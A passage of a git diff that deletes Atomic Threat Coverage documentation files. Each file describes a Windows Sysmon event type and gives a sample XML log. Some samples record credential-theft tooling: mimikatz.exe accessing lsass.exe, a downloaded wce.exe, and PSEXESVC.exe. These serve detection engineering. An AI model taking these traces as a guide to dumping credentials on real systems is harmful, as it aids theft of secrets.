-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>7</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>7</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-09T04:15:07.860831900Z" /> 
-    <EventRecordID>9146</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="1540" ThreadID="3456" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-07-09 04:13:59.602</Data> 
-    <Data Name="ProcessGuid">{717CFEC0-1487-5D24-0000-00103F202900}</Data> 
-    <Data Name="ProcessId">2352</Data> 
-    <Data Name="Image">C:\Windows\System32\sihost.exe</Data> 
-    <Data Name="ImageLoaded">C:\Windows\System32\msvcrt.dll</Data> 
-    <Data Name="FileVersion">7.0.14393.0 (rs1_release.160715-1616)</Data> 
-    <Data Name="Description">Windows NT CRT DLL</Data> 
-    <Data Name="Product">Microsoft® Windows® Operating System</Data> 
-    <Data Name="Company">Microsoft Corporation</Data> 
-    <Data Name="OriginalFileName">msvcrt.dll</Data> 
-    <Data Name="Hashes">MD5=94EF9321C287FC1B179419E662996A41,SHA256=555B434EC9E8628820905A8F1D7BC7F8EE99C6D44A01892ADD16E39E6B675A0D</Data> 
-    <Data Name="Signed">true</Data> 
-    <Data Name="Signature">Microsoft Windows</Data> 
-    <Data Name="SignatureStatus">Valid</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0012_8_windows_sysmon_CreateRemoteThread.md b/Atomic_Threat_Coverage/Data_Needed/DN0012_8_windows_sysmon_CreateRemoteThread.md
deleted file mode 100644
index cd7356d..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0012_8_windows_sysmon_CreateRemoteThread.md
+++ /dev/null
@@ -1,55 +0,0 @@
-| Title              | DN0012_8_windows_sysmon_CreateRemoteThread       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The CreateRemoteThread event detects when a process creates a thread in  another process |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90008](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90008)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-8.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-8.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>SourceProcessGuid</li><li>SourceProcessId</li><li>SourceImage</li><li>TargetProcessGuid</li><li>TargetProcessId</li><li>TargetImage</li><li>NewThreadId</li><li>StartAddress</li><li>StartModule</li><li>StartFunction</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" />
-    <EventID>8</EventID>
-    <Version>2</Version>
-    <Level>4</Level>
-    <Task>8</Task>
-    <Opcode>0</Opcode>
-    <Keywords>0x8000000000000000</Keywords>
-    <TimeCreated SystemTime="2017-05-13T22:53:43.214864300Z" />
-    <EventRecordID>739823</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="2848" ThreadID="3520" />
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
-    <Computer>atc-win-10.atc.local</Computer>
-    <Security UserID="S-1-5-18" />
-  </System>
-  - <EventData>
-    <Data Name="UtcTime">2017-05-13 22:53:43.214</Data>
-    <Data Name="SourceProcessGuid">{A23EAE89-8E6D-5917-0000-0010DFAF5004}</Data>
-    <Data Name="SourceProcessId">8804</Data>
-    <Data Name="SourceImage">C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe</Data>
-    <Data Name="TargetProcessGuid">{A23EAE89-8E5A-5917-0000-00100E3E4D04}</Data>
-    <Data Name="TargetProcessId">2024</Data>
-    <Data Name="TargetImage">C:\repos\Supercharger\Mtg.Supercharger.ControllerService\bin\x64\Debug\Mtg.Supercharger.ControllerService.exe</Data>
-    <Data Name="NewThreadId">20532</Data>
-    <Data Name="StartAddress">0x00007FFB09321970</Data>
-    <Data Name="StartModule">C:\Windows\SYSTEM32\ntdll.dll</Data>
-    <Data Name="StartFunction">DbgUiRemoteBreakin</Data>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0013_9_windows_sysmon_RawAccessRead.md b/Atomic_Threat_Coverage/Data_Needed/DN0013_9_windows_sysmon_RawAccessRead.md
deleted file mode 100644
index dfa3fa3..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0013_9_windows_sysmon_RawAccessRead.md
+++ /dev/null
@@ -1,49 +0,0 @@
-| Title              | DN0013_9_windows_sysmon_RawAccessRead       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The RawAccessRead event detects when a process conducts reading operations  from the drive using the \\.\ denotation |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-9.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-9.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>Device</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" />
-    <EventID>9</EventID>
-    <Version>2</Version>
-    <Level>4</Level>
-    <Task>9</Task>
-    <Opcode>0</Opcode>
-    <Keywords>0x8000000000000000</Keywords>
-    <TimeCreated SystemTime="2018-03-22T20:32:22.333778700Z" />
-    <EventRecordID>1944686</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="19572" ThreadID="21888" />
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
-    <Computer>atc-win-10.atc.local</Computer>
-    <Security UserID="S-1-5-18" />
-  </System>
-  - <EventData>
-    <Data Name="UtcTime">2018-03-22 20:32:22.332</Data>
-    <Data Name="ProcessGuid">{A23EAE89-C65F-5AB2-0000-0010EB030000}</Data>
-    <Data Name="ProcessId">4</Data>
-    <Data Name="Image">System</Data>
-    <Data Name="Device">\Device\HarddiskVolume2</Data>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0014_10_windows_sysmon_ProcessAccess.md b/Atomic_Threat_Coverage/Data_Needed/DN0014_10_windows_sysmon_ProcessAccess.md
deleted file mode 100644
index c84e166..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0014_10_windows_sysmon_ProcessAccess.md
+++ /dev/null
@@ -1,55 +0,0 @@
-| Title              | DN0014_10_windows_sysmon_ProcessAccess       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The process accessed event reports when a process opens another process, an  operation that’s often followed by information queries or reading and writing  the address space of the target process |
-| **Logging Policy** | <ul><li>[LP0007_windows_sysmon_ProcessAccess](../Logging_Policies/LP0007_windows_sysmon_ProcessAccess.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90010](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90010)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-10.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-10.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>SourceProcessGUID</li><li>SourceProcessId</li><li>SourceThreadId</li><li>SourceImage</li><li>TargetProcessGUID</li><li>TargetProcessId</li><li>TargetImage</li><li>GrantedAccess</li><li>CallTrace</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>10</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>10</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-01-30T14:28:35.216091900Z" /> 
-    <EventRecordID>42444</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3892" ThreadID="5724" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-01-30 14:28:35.212</Data> 
-    <Data Name="SourceProcessGUID">{9683FBB1-B470-5C51-0000-0010521EBB00}</Data> 
-    <Data Name="SourceProcessId">6916</Data> 
-    <Data Name="SourceThreadId">8080</Data> 
-    <Data Name="SourceImage">C:\Users\user1\Desktop\mimi\x64\mimikatz.exe</Data> 
-    <Data Name="TargetProcessGUID">{9683FBB1-9A52-5C51-0000-0010C3610000}</Data> 
-    <Data Name="TargetProcessId">672</Data> 
-    <Data Name="TargetImage">C:\windows\system32\lsass.exe</Data> 
-    <Data Name="GrantedAccess">0x1010</Data> 
-    <Data Name="CallTrace">C:\windows\SYSTEM32\ntdll.dll+9a3c4|C:\windows\System32\KERNELBASE.dll+2fd5d|C:\Users\user1\Desktop\mimi\x64\mimikatz.exe+7a906|C:\Users\user1\Desktop\mimi\x64\mimikatz.exe+7ac75|C:\Users\user1\Desktop\mimi\x64\mimikatz.exe+7a82d|C:\Users\user1\Desktop\mimi\x64\mimikatz.exe+4d28c|C:\Users\user1\Desktop\mimi\x64\mimikatz.exe+4d0c4|C:\Users\user1\Desktop\mimi\x64\mimikatz.exe+4cea1|C:\Users\user1\Desktop\mimi\x64\mimikatz.exe+80675|C:\windows\System32\KERNEL32.DLL+13034|C:\windows\SYSTEM32\ntdll.dll+71471</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0015_11_windows_sysmon_FileCreate.md b/Atomic_Threat_Coverage/Data_Needed/DN0015_11_windows_sysmon_FileCreate.md
deleted file mode 100644
index d30304b..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0015_11_windows_sysmon_FileCreate.md
+++ /dev/null
@@ -1,51 +0,0 @@
-| Title              | DN0015_11_windows_sysmon_FileCreate       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | File create operations are logged when a file is created or overwritten. This  event is useful for monitoring autostart locations, like the Startup folder,  as well as temporary and download directories, which are common places  malware drops during initial infection |
-| **Logging Policy** | <ul><li>[LP0008_windows_sysmon_FileCreate](../Logging_Policies/LP0008_windows_sysmon_FileCreate.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90011](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90011)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-11.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-11.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>TargetFilename</li><li>CreationUtcTime</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>11</EventID> 
-    <Version>2</Version> 
-    <Level>4</Level> 
-    <Task>11</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-01-30T15:08:51.296611700Z" /> 
-    <EventRecordID>42528</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3892" ThreadID="5724" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-01-30 15:08:51.287</Data> 
-    <Data Name="ProcessGuid">{9683FBB1-9A3F-5C51-0000-0010EB030000}</Data> 
-    <Data Name="ProcessId">4</Data> 
-    <Data Name="Image">System</Data> 
-    <Data Name="TargetFilename">C:\Windows\PSEXESVC.exe</Data> 
-    <Data Name="CreationUtcTime">2019-01-30 15:08:51.287</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0016_12_windows_sysmon_RegistryEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0016_12_windows_sysmon_RegistryEvent.md
deleted file mode 100644
index 9f8568f..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0016_12_windows_sysmon_RegistryEvent.md
+++ /dev/null
@@ -1,51 +0,0 @@
-| Title              | DN0016_12_windows_sysmon_RegistryEvent       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Registry key and value create and delete operations map to this event type,  which can be useful for monitoring for changes to Registry autostart  locations, or specific malware registry modifications |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90012](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90012)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-12.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-12.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>EventType</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>TargetObject</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>12</EventID> 
-    <Version>2</Version> 
-    <Level>4</Level> 
-    <Task>12</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-01-30T17:05:28.027841800Z" /> 
-    <EventRecordID>42938</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3892" ThreadID="5724" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="EventType">DeleteKey</Data> 
-    <Data Name="UtcTime">2019-01-30 17:05:28.023</Data> 
-    <Data Name="ProcessGuid">{9683FBB1-D812-5C51-0000-0010F3871201}</Data> 
-    <Data Name="ProcessId">10396</Data> 
-    <Data Name="Image">C:\Windows\regedit.exe</Data> 
-    <Data Name="TargetObject">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\New Key #1</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0017_13_windows_sysmon_RegistryEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0017_13_windows_sysmon_RegistryEvent.md
deleted file mode 100644
index 83e6d8d..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0017_13_windows_sysmon_RegistryEvent.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0017_13_windows_sysmon_RegistryEvent       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This Registry event type identifies Registry value modifications. The event  records the value written for Registry values of type DWORD and QWORD |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90013](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90013)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-13.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-13.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>EventType</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>TargetObject</li><li>Details</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>13</EventID> 
-    <Version>2</Version> 
-    <Level>4</Level> 
-    <Task>13</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-01-30T17:06:11.698273500Z" /> 
-    <EventRecordID>42943</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3892" ThreadID="5724" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="EventType">SetValue</Data> 
-    <Data Name="UtcTime">2019-01-30 17:06:11.673</Data> 
-    <Data Name="ProcessGuid">{9683FBB1-D812-5C51-0000-0010F3871201}</Data> 
-    <Data Name="ProcessId">10396</Data> 
-    <Data Name="Image">C:\Windows\regedit.exe</Data> 
-    <Data Name="TargetObject">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\New Value #1</Data> 
-    <Data Name="Details">C:\Program Files\Sublime Text 3\sublime_text.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0018_14_windows_sysmon_RegistryEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0018_14_windows_sysmon_RegistryEvent.md
deleted file mode 100644
index afc81d3..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0018_14_windows_sysmon_RegistryEvent.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0018_14_windows_sysmon_RegistryEvent       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Registry key and value rename operations map to this event type, recording  the new name of the key or value that was renamed |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90014](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90014)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-14.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-14.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>EventType</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>TargetObject</li><li>NewName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" />
-    <EventID>14</EventID>
-    <Version>2</Version>
-    <Level>4</Level>
-    <Task>14</Task>
-    <Opcode>0</Opcode>
-    <Keywords>0x8000000000000000</Keywords>
-    <TimeCreated SystemTime="2019-01-30T18:16:38.889738400Z" />
-    <EventRecordID>43065</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="3892" ThreadID="5724" />
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
-    <Computer>atc-win-10.atc.local</Computer>
-    <Security UserID="S-1-5-18" />
-  </System>
-  - <EventData>
-    <Data Name="RuleName" />
-    <Data Name="EventType">RenameKey</Data>
-    <Data Name="UtcTime">2019-01-30 18:16:38.886</Data>
-    <Data Name="ProcessGuid">{9683FBB1-D812-5C51-0000-0010F3871201}</Data>
-    <Data Name="ProcessId">10396</Data>
-    <Data Name="Image">C:\Windows\regedit.exe</Data>
-    <Data Name="TargetObject">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\New Key #1</Data>
-    <Data Name="NewName">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\New Key #2</Data>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0019_15_windows_sysmon_FileCreateStreamHash.md b/Atomic_Threat_Coverage/Data_Needed/DN0019_15_windows_sysmon_FileCreateStreamHash.md
deleted file mode 100644
index 6d91994..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0019_15_windows_sysmon_FileCreateStreamHash.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0019_15_windows_sysmon_FileCreateStreamHash       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event logs when a named file stream is created, and it generates events  that log the hash of the contents of the file to which the stream is assigned  (the unnamed stream), as well as the contents of the named stream |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-15.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-15.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>TargetFilename</li><li>CreationUtcTime</li><li>Hash</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>15</EventID> 
-    <Version>2</Version> 
-    <Level>4</Level> 
-    <Task>15</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-01-21T12:43:53.385072700Z" /> 
-    <EventRecordID>34115</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="2052" ThreadID="4092" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-01-21 12:43:53.368</Data> 
-    <Data Name="ProcessGuid">{9683FBB1-A860-5C45-0000-0010274F1400}</Data> 
-    <Data Name="ProcessId">6604</Data> 
-    <Data Name="Image">C:\windows\Explorer.EXE</Data> 
-    <Data Name="TargetFilename">C:\Users\user1\Downloads\wce_v1_42beta_x64\wce.exe</Data> 
-    <Data Name="CreationUtcTime">2013-11-11 22:41:40.000</Data> 
-    <Data Name="Hash">MD5=CCF1D1573F175299ADE01C07791A6541,SHA256=68A15A34C2E28B9B521A240B948634617D72AD619E3950BC6DC769E60A0C3CF2</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0020_17_windows_sysmon_PipeEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0020_17_windows_sysmon_PipeEvent.md
deleted file mode 100644
index 09540d2..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0020_17_windows_sysmon_PipeEvent.md
+++ /dev/null
@@ -1,51 +0,0 @@
-| Title              | DN0020_17_windows_sysmon_PipeEvent       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates when a named pipe is created. Malware often uses named  pipes for interprocess communication |
-| **Logging Policy** | <ul><li>[LP0009_windows_sysmon_PipeEvent](../Logging_Policies/LP0009_windows_sysmon_PipeEvent.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-17.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-17.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90017](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90017)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>EventType</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>PipeName</li><li>Image</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>17</EventID> 
-    <Version>1</Version> 
-    <Level>4</Level> 
-    <Task>17</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-09T04:21:40.086214400Z" /> 
-    <EventRecordID>14921</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="1540" ThreadID="3456" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="EventType">CreatePipe</Data> 
-    <Data Name="UtcTime">2019-07-09 04:21:39.850</Data> 
-    <Data Name="ProcessGuid">{717CFEC0-1651-5D24-0000-00109AFB3E00}</Data> 
-    <Data Name="ProcessId">5624</Data> 
-    <Data Name="PipeName">\mojo.5624.7020.12775972776436680360</Data> 
-    <Data Name="Image">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0021_18_windows_sysmon_PipeEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0021_18_windows_sysmon_PipeEvent.md
deleted file mode 100644
index 81b2799..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0021_18_windows_sysmon_PipeEvent.md
+++ /dev/null
@@ -1,51 +0,0 @@
-| Title              | DN0021_18_windows_sysmon_PipeEvent       |
